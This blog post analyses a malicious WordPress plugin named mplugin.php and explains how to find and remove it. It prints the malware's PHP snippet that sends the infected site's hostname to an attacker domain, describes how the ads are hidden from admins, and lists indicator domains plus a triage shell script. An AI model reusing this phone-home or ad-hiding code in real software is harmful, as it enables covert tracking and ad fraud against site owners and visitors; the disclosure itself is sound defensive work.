Malware on WordPress (Beware)

Muhammad Iqbal
Nov 5, 2020
(Image: snippet from malware)

A few minutes ago I received a WhatsApp message from a friend saying that his WordPress site had been acting strangely for the past few days. After an initial look at the site, I found a few recently created files with the following names:

  • mplugin.php
  • admin_ips.txt

At first glance the files look like legitimate plugin files; as the image above shows, the plugin carries the same kind of header information as any other WordPress plugin. Reading through the files, I found several suspicious pieces of code. Here is one of them:

```php
// Phone home on first run: report this site's hostname to the attacker's domain,
// then (elsewhere) mark the 'log_install' option so it is only done once.
if (get_option('log_install') !== '1') {
    if (!$log_installed = @file_get_contents("http://www.yomndo.com/o2.php?host=" . $_SERVER["HTTP_HOST"])) {
        // fallback fetch helper defined elsewhere in the malware (not shown here)
        $log_installed = @file_get_contents_mplugin("http://www.yomndo.com/o2.php?host=" . $_SERVER["HTTP_HOST"]);
    }
}
```

As you can see, the plugin reports its installation status to an unknown site, yomndo.com, and includes $_SERVER["HTTP_HOST"], the infected site's own hostname, in the request. There is no legitimate reason for a plugin to do that: it simply tells the attacker which sites now carry the code. The @ in front of file_get_contents() also hides any PHP warning from the error log if the request fails.

Okay, next, let's look at this one:

(Image: Logging WordPress admin IP)

This piece of code creates the admin_ips.txt file mentioned above. It stores the public IP addresses that admins use to log in to the WordPress site.

Digging deeper into this file, I found that the code is designed to inject adware into the victim's WordPress site, and that the adware hides itself whenever the visitor's IP address is known (an admin IP listed in the file), and from logged-in users as well, judging by the hide_admin and hide_logged_in settings further down. The practical consequence is that the site owner never sees the injected ads. To confirm the infection, view the site from a network whose IP is not in admin_ips.txt and without a logged-in session.

(Image: Display adware)

Below are a few domains related to this attack. At the time of my checking, these domains were still live and still collecting data, so check your WordPress site now: search your plugins and themes for any reference to these domains, and check for registered users with e-mail addresses on them.

yomndo.com
yomndo.top
yomndo.xyz

womndo.com
zrilns.pw

About the strange behaviour I mentioned earlier: my friend kept complaining that unknown users were registering on his site. He did not know any of them, and whenever he deleted them, new ones registered again using e-mail addresses from the same domain. I am still not sure how the malware was injected, but I believe an outdated theme or plugin with a known vulnerability was used as the entry point to upload this code.

How to clear this malware?

It is fairly straightforward: find the files listed above and remove them. Also look for files created less than a week ago and check whether each one belongs to an installed plugin or theme or should not be there at all. Back up your WordPress site first, then delete those files.

For the database, look for newly created entries in the tables. Here is the list of option names I extracted from the code:

```php
// Option names the malware registers; each one that is actually set
// ends up as an option_name row in the wp_options table.
add_action( 'admin_init', function() {
    register_setting( 'mplugin-settings', 'default_mont_options' );
    register_setting( 'mplugin-settings', 'ad_code' );
    register_setting( 'mplugin-settings', 'hide_admin' );
    register_setting( 'mplugin-settings', 'hide_logged_in' );
    register_setting( 'mplugin-settings', 'display_ad' );
    register_setting( 'mplugin-settings', 'search_engines' );
    register_setting( 'mplugin-settings', 'auto_update' );
    register_setting( 'mplugin-settings', 'ip_admin' );
    register_setting( 'mplugin-settings', 'cookies_admin' );
    register_setting( 'mplugin-settings', 'logged_admin' );
    register_setting( 'mplugin-settings', 'log_install' );
} );
```

As I understand it, these are stored as rows in the wp_options table (in the option_name column). Search for each of these names and delete them one by one. Note that register_setting() only declares the names; a row exists only for the options the malware actually wrote, so some of them may be absent. While you are in the database, also review the wp_users table for the unknown accounts mentioned above and remove any that you did not create.
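The cleanup procedure above, as an added shell example (this is not code from the original post): it scans a WordPress root for PHP files changed in the last few days, for any file referencing the domains listed above, and for the two dropped file names, then prints the WP-CLI and SQL commands for the option names instead of deleting anything itself. The sample site tree, the plugin paths and the IP 203.0.113.10 are constructed for illustration; the WordPress root on a real server is whatever path you point the functions at.

```shell
#!/bin/sh
# Added example: triage helpers for the mplugin.php / admin_ips.txt infection.
# The sample tree built by make_sample_site is constructed for illustration.

# Domains the post lists as indicators of compromise (IOCs).
IOC_DOMAINS="yomndo.com yomndo.top yomndo.xyz womndo.com zrilns.pw"

# wp_options names taken from the malware's register_setting() calls.
MPLUGIN_OPTIONS="default_mont_options ad_code hide_admin hide_logged_in display_ad \
search_engines auto_update ip_admin cookies_admin logged_admin log_install"

# 1. PHP files created or changed in the last N days (default 7) under a WordPress root.
recent_php() {
    site=$1; days=${2:-7}
    find "$site" -type f -name '*.php' -mtime "-$days" | sort
}

# 2. Files anywhere under the root that reference one of the IOC domains.
#    Themes, plugins and uploads are all searched; the post found the dropper
#    in a fake plugin, but a search should not assume that is the only copy.
ioc_hits() {
    site=$1
    pattern=""
    for d in $IOC_DOMAINS; do
        esc=$(printf '%s' "$d" | sed 's/\./\\./g')   # escape dots for -E
        pattern="${pattern:+$pattern|}$esc"
    done
    grep -rlE "$pattern" "$site" 2>/dev/null | sort
}

# 3. The two file names this sample drops.
dropped_files() {
    site=$1
    find "$site" -type f \( -name 'mplugin.php' -o -name 'admin_ips.txt' \) | sort
}

# 4. Database cleanup: print WP-CLI commands and the equivalent SQL for the
#    option names rather than deleting blindly. Take a backup before running them.
option_cleanup_commands() {
    for opt in $MPLUGIN_OPTIONS; do
        printf 'wp option delete %s\n' "$opt"
    done
    in_list=$(printf "'%s'," $MPLUGIN_OPTIONS | sed 's/,$//')
    printf 'DELETE FROM wp_options WHERE option_name IN (%s);\n' "$in_list"
}

# Constructed sample site so the helpers can be exercised offline.
make_sample_site() {
    site=$(mktemp -d)
    mkdir -p "$site/wp-content/plugins/akismet" "$site/wp-content/plugins/mplugin"
    # a clean plugin file with an old modification time
    echo '<?php // legitimate plugin code' > "$site/wp-content/plugins/akismet/akismet.php"
    touch -t 202001010000 "$site/wp-content/plugins/akismet/akismet.php"
    # the freshly written dropper, phoning home to an IOC domain
    cat > "$site/wp-content/plugins/mplugin/mplugin.php" <<'EOF'
<?php
$log_installed = @file_get_contents("http://www.yomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
EOF
    printf '203.0.113.10\n' > "$site/wp-content/plugins/mplugin/admin_ips.txt"
    echo "$site"
}

# Usage on a real server (paths are examples):
#   recent_php /var/www/html 7
#   ioc_hits /var/www/html
#   dropped_files /var/www/html
#   option_cleanup_commands
```

Review every hit before deleting: a legitimately updated plugin also shows up in recent_php, so cross-check each path against the plugins and themes you know are installed, and keep a copy of anything you remove in case you need it for further analysis.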

Alright, that's it. This is actually my first post here; I will add more topics later if I find something interesting. Bye guys. I hope this is useful to WordPress users.
